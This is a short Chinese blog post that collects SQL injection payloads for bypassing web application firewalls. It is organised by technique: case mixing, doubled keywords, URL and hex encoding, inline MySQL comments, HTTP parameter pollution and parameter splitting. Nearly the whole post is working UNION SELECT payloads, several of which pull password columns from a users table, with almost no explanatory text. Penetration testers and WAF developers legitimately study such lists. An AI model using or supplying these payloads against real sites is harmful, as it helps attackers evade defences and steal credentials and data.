SQL注入过WAF思路

ForDream 2022-12-27 网络安全 50 阅读 
大小写
id=-1 uNIoN sELecT 1,2,3
双写
id=-1 UNIunionON SELselectECT 1,2,3
编码
id=1%252f%252a*/UNION%252f%252a /SELECT
id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1
十六进制
id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
注释&内联注释
id=-1 %55nION/**/%53ElecT 1,2,3
id=-1'union%a0select pass from users#
id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3


http参数解析
/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1&id=2,3+from+users+where+id=1—
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

http参数分段
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

原文学习地址:https://www.cnblogs.com/Yang34/p/14139164.html

 

版权声明:
作者:ForDream
链接:https://ishoud.com/index.php/2022/12/27/11567.html
来源:工具人
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
海报
SQL注入过WAF思路
大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 ……
<<上一篇
下一篇>>
免责声明 1、本网站名称:工具人博客
2、本站永久网址:https://ishoud.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ810066660进行删除处理。谢谢!
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7、不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。
8、本站信息来自网络收集整理,版权争议与本站无关,我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!